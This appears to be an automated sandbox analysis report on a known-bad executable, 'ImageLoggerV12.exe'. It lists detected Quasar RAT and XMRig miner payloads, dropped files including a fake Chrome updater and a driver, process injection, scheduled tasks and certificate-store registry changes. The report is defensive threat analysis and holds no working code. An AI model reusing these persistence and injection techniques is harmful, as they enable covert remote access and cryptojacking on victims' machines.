Analysis Overview
SHA256
427895a73d7150c8f132f251c230ae0686ee0b89e13e46258f40b0de1cc5e638
Threat Level: Known bad
The file ImageLoggerV12.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar RAT
Quasar payload
XMRig Miner payload
Blocklisted process makes network request
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
UPX packed file
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Program Files directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of SetWindowsHookEx
Suspicious behavior: LoadsDriver
Enumerates processes with tasklist
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2023-09-10 03:56
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2023-09-10 03:56
Reported
2023-09-10 04:10
Platform
win10v2004-20230831-en
Max time kernel
639s
Max time network
635s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5144 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 5144 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 5144 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 5144 created 3264 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 4988 created 3264 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 4988 created 3264 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 4988 created 3264 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 4988 created 3264 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 4988 created 3264 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GC.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4988 set thread context of 5188 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 4988 set thread context of 4340 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\cmd.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,4514977508286117279,12006304953039510594,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,5142347409584299056,8829815679591727427,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,5142347409584299056,8829815679591727427,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,4514977508286117279,12006304953039510594,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,17914044602809512869,8429339695825631866,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,17914044602809512869,8429339695825631866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8b33646f8,0x7ff8b3364708,0x7ff8b3364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,17662033343902385222,15333422210673952314,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
